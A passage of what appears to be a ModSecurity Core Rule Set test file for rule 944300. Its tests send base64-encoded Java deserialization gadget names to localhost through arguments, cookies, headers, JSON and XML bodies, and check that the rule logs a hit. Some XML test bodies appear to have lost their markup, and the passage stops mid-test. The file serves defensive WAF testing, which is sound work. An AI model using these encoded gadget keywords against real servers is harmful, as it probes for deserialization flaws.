dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-271 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-272 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" output: log_contains: "id \"944300\"" - test_title: 944300-273 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" output: log_contains: "id \"944300\"" - test_title: 944300-274 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-275 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-276 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" output: log_contains: "id \"944300\"" - test_title: 944300-277 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-278 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-279 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-280 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-281 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-282 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-283 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" output: log_contains: "id \"944300\"" - test_title: 944300-284 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" output: log_contains: "id \"944300\"" - test_title: 944300-285 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-286 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-287 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-288 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-289 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-290 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-291 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-292 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-293 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-294 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" output: log_contains: "id \"944300\"" - test_title: 944300-295 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" output: log_contains: "id \"944300\"" - test_title: 944300-296 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-297 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-298 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl=test" output: log_contains: "id \"944300\"" - test_title: 944300-299 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=d2hpbGVjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-300 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: d2hpbGVjbG9zdXJl=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-301 desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: d2hpbGVjbG9zdXJl method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-302 desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-303 desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-304 desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "d2hpbGVjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-305 desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=d2hpbGVjbG9zdXJl" output: log_contains: "id \"944300\"" - test_title: 944300-306 desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" output: log_contains: "id \"944300\"" - test_title: 944300-307 desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-308 desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HdoaWxlY2xvc3VyZQ" output: log_contains: "id \"944300\"" - test_title: 944300-309 desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HdoaWxlY2xvc3VyZQ=test" output: log_contains: "id \"944300\"" - test_title: 944300-310 desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HdoaWxlY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-311 desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HdoaWxlY2xvc3VyZQ=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-312 desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HdoaWxlY2xvc3VyZQ method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-313 desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-314 desc: "XML element value includes keyword 